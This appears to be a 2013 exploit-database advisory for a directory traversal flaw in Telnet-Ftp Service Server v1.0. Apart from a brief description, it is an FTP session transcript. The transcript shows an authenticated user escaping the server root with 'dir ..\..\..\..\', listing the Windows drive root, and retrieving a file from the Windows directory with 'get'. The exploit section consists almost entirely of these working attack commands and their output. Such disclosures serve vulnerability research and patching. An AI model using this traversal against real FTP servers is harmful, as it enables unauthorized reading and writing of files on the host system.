# Exploit Title: Telnet-Ftp Service Server v1.0 Directory Traversal Vulnerability
# Date Published: 2013/6/18
# Exploit Author: Chako
# Software Link: http://telnet-ftp-server.en.softonic.com/
# Version: v1.0 (Build 1.218)
# Tested on: Windows Xp SP3 English
Description:
=====================
A vulnerability has been identified in Telnet-Ftp Service Server v1.0,
which allows attackers to read or write arbitrary files.
Exploit:
=====================
220 FTP Server ready. Telnet-Ftp Server v. 1.0 (Build 1.218)
User (127.0.0.1:(none)): chako
331 Password required for chako.
Password:
230 User chako logged in.
ftp> dir ..\..\..\..\
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Jun 12 2012 Program Files
-rw-rw-rw- 1 ftp ftp 0 Jun 12 2012 CONFIG.SYS
-rwxrwxrwx 1 ftp ftp 0 Jun 12 2012 AUTOEXEC.BAT
drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Python27
drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Perl
drw-rw-rw- 1 ftp ftp 0 Sep 07 2012 eb83393ec0d8ee1eab4b219f
drw-rw-rw- 1 ftp ftp 0 Jun 08 10:55 Win32
drw-rw-rw- 1 ftp ftp 0 Jun 08 12:46 tool
drw-rw-rw- 1 ftp ftp 0 Jun 08 16:51 New Folder
drw-rw-rw- 1 ftp ftp 0 Jun 08 23:22 TYPSoft FTP Server
-rw-rw-rw- 1 ftp ftp 9 Jun 18 00:03 END
-rw-rw-rw- 1 ftp ftp 0 Jun 18 00:04 Documents
226 File sent ok
ftp: 933 bytes received in 0.00Seconds 933000.00Kbytes/sec.
ftp> get ..\..\..\..\windows\hack.txt
200 Port command successful.
150 Opening data connection for ..\..\..\..\windows\hack.txt.
226 File sent ok
ftp: 14 bytes received in 0.00Seconds 14000.00Kbytes/sec.
ftp> !type hack.txt
Hello~ World!~ftp>